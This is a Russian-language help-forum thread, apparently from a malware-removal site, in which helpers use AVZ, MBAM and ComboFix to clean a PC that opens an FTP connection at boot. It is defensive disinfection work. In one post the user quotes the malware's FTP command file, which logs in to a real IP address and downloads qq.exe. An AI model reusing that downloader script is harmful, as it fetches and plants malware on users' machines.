Пролема следующая.
При загрузке системы открывается окошко cmd.exe
Пытается залогиниться на какой то фтпшник.
В завершении вылазит окно что файл ..../qq.exe не является приложением win32
Printable View
Пролема следующая.
При загрузке системы открывается окошко cmd.exe
Пытается залогиниться на какой то фтпшник.
В завершении вылазит окно что файл ..../qq.exe не является приложением win32
Уважаемый(ая) [B]prorock8[/B], спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы, в самое ближайшее время, ответят на Ваш запрос.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="http://virusinfo.info/donate/"]поддержите проект[/URL].
Выполните скрипт в AVZ
[code] begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
QuarantineFile('c:\windows\aq.bat','');
DeleteFile('c:\windows\aq.bat');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
ExecuteRepair(9);
RebootWindows(true);
end. [/code]Компьютер перезагрузится.
Пришлите карантин согласно [B]Приложения 3[/B] правил по красной ссылке [COLOR="Red"][U][B]Прислать запрошенный карантин[/B][/U][/COLOR] вверху темы
Обновите базы AVZ
Сделайте новые логи
Пожалуйста
Что с проблемой?
[QUOTE=thyrex;797846]Что с проблемой?[/QUOTE]
осталась
Сделайте лог [url="http://virusinfo.info/showpost.php?p=457118&postcount=1"]полного сканирования МВАМ[/url]
[QUOTE=thyrex;798326]Сделайте лог [URL="http://virusinfo.info/showpost.php?p=457118&postcount=1"]полного сканирования МВАМ[/URL][/QUOTE]
вот
Удалите
[CODE]c:\documents and settings\skorotenko\application data\archsoft\winzips.exe (Trojan.FakeSMS) -> No action taken.[/CODE]
[QUOTE=thyrex;799318]Удалите
[CODE]c:\documents and settings\skorotenko\application data\archsoft\winzips.exe (Trojan.FakeSMS) -> No action taken.[/CODE][/QUOTE]
Все по прежнему.
[size="1"][color="#666686"][B][I]Добавлено через 5 минут[/I][/B][/color][/size]
В папках C:\Documents and settings\имя учетки
лежат текстовый файл cmd с содержанием:
open 122.227.226.39
123
123
binary
get qq.exe
bye
и собственно файл qq.exe
Сделайте лог [url="http://virusinfo.info/showpost.php?p=493610&postcount=1"]ComboFix[/url]
[QUOTE=thyrex;800107]Сделайте лог [URL="http://virusinfo.info/showpost.php?p=493610&postcount=1"]ComboFix[/URL][/QUOTE]
Помогло, спасибо.
[url="http://virusinfo.info/showpost.php?p=500136&postcount=2"]Удалите ComboFix[/url]
Статистика проведенного лечения:
[LIST][*]Получено карантинов: [B]1[/B][*]Обработано файлов: [B]2[/B][*]В ходе лечения вредоносные программы в карантинах не обнаружены[/LIST]